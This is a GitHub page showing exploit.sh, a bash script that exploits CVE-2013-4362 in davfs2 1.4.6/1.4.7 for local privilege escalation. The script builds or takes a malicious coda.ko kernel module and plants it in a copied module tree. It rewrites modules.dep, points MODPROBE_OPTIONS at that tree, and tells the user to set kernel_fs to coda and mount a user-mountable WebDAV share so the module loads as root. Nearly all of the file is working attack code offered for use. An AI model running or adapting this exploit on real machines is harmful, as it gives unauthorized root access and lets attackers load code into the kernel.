-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathexploit.sh
More file actions
81 lines (66 loc) · 3.05 KB
/
exploit.sh
File metadata and controls
81 lines (66 loc) · 3.05 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!/bin/bash
# Exploit Title: davfs2 1.4.6/1.4.7 local privilege escalation exploit
# Date: 05/10/2013
# Exploit Author: Lorenzo Cantoni
# Vendor Homepage: http://savannah.nongnu.org/projects/davfs2
# Version: 1.4.6 (tested), 1.4.7 (untested)
# Tested on: Xubuntu 12.04 x86_64
# CVE: 2013-4362
# Info: Vulnerability reported by Werner Baumann: http://www.securityfocus.com/bid/62445
KERNELV=`uname -r`
echo "#######################################"
echo "Specify the full path of the kernel module which you want to load"
echo "Leave empty if you wish to compile it now"
echo "Understand that you need kernel headers, make and gcc for successful compilation"
echo "#######################################"
read EXPLOITMODPATH
if [ -z $EXPLOITMODPATH ]; then
make
EXPLOITMODPATH=$PWD/coda.ko
fi
echo "#######################################"
echo "Copying the modules in use for the running kernel in the local directory"
echo "#######################################"
mkdir -p lib/modules
cp -R /lib/modules/`uname -r` lib/modules
echo "#######################################"
echo "Copying coda.ko module"
echo "#######################################"
cp $EXPLOITMODPATH $PWD/lib/modules/$KERNELV/kernel/fs/coda
echo "#######################################"
echo "Setting the 'modules.dep' and running depmod"
echo "#######################################"
echo -n $PWD | sed 's/\//\\\//g' > /tmp/escapedpwd
ESCAPEDPWD=`cat /tmp/escapedpwd`
OLD_CODA_PATH="kernel\/fs\/coda\/coda.ko"
NEW_CODA_PATH="$ESCAPEDPWD\/lib\/modules\/$KERNELV\/kernel\/fs\/coda\/coda.ko"
sed 's/'$OLD_CODA_PATH'/'$NEW_CODA_PATH'/g' $PWD/lib/modules/$KERNELV/modules.dep > /tmp/new_modules.dep
cat /tmp/new_modules.dep | sed 's/\\//g' > /tmp/modules.dep.ok
cp /tmp/modules.dep.ok $PWD/lib/modules/$KERNELV/modules.dep
depmod -b $PWD
echo "#######################################"
echo "Setting MODPROBE_OPTIONS variable"
echo "#######################################"
export MODPROBE_OPTIONS="-d $PWD"
echo "#######################################"
echo "Now, check the the $HOME/.davfs2/davfs.conf. Modify the default value of 'kernel_fs' to coda eg:"
echo "# General Options"
echo "# ---------------"
echo ""
echo "# dav_user davfs2 # system wide config file only"
echo "# dav_group davfs2 # system wide config file only"
echo "# ignore_home # system wide config file only"
echo "kernel_fs coda"
echo "# buf_size 16 # KiByte"
echo "#######################################"
echo "#######################################"
echo "Then, check /etc/fstab for remote webdav servers which the user can mount, eg:"
echo "https://www.crushftp.com/demo/ /home/foo/dav davfs noauto,user 0 0"
echo "#######################################"
echo "#######################################"
echo "If the remote webdav is authenticated, ensure to have valid credentials. The run 'mount /home/foo/dav' inside this terminal'"
echo "#######################################"
rm /tmp/escapedpwd
rm /tmp/new_modules.dep
rm /tmp/modules.dep.ok
exec /bin/bash -i